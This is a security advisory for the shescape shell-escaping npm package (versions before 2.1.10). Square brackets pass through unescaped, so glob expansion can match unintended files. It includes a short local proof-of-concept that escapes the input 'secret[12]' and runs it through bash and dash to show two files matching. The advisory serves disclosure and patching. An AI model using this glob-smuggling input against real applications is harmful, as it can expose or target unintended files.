Improper Encoding or Escaping of Output Affecting shescape package, versions <2.1.10

shescape is a simple shell escape library

Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output in the escape function. An attacker can cause unintended expansion of shell arguments by supplying input containing square brackets, which may result in multiple filesystem matches being processed instead of a single literal argument. This can lead to changes in command behavior, targeting of unintended files, or exposure of filenames when the output is used in shell commands.

tmp=$(mktemp -d)
cd "$tmp"
npm pack shescape@2.1.9 >/dev/null
mkdir pkg
tar -xzf shescape-2.1.9.tgz -C pkg
cd pkg/package
npm install --omit=dev

node --input-type=module - <<'NODE'
import { mkdtempSync, writeFileSync } from "node:fs";
import { tmpdir } from "node:os";
import path from "node:path";
import { execSync } from "node:child_process";
import { Shescape } from "./src/index.js";

const dir = mkdtempSync(path.join(tmpdir(), "shescape-ghsa-poc-"));
writeFileSync(path.join(dir, "secret1"), "");
writeFileSync(path.join(dir, "secret2"), "");

for (const shell of ["/usr/bin/bash", "/usr/bin/dash"]) {
  const shescape = new Shescape({ shell });
  const escaped = shescape.escape("secret[12]");
  console.log(${shell} escaped=${escaped});
  const out = execSync(printf '<%s>\\n' ${escaped}, { cwd: dir, shell }).toString();
  process.stdout.write(out);
}
NODE

• GitHub Commit